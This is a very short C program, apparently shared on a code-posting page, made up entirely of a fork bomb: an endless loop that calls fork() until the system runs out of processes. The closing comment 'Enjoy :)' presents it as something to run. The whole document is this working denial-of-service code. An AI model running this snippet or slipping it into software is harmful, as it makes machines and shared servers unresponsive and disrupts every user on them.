8

#include <unistd.h>

int main(void){
while(1) fork();
}

// Enjoy :)

Comments
Add Comment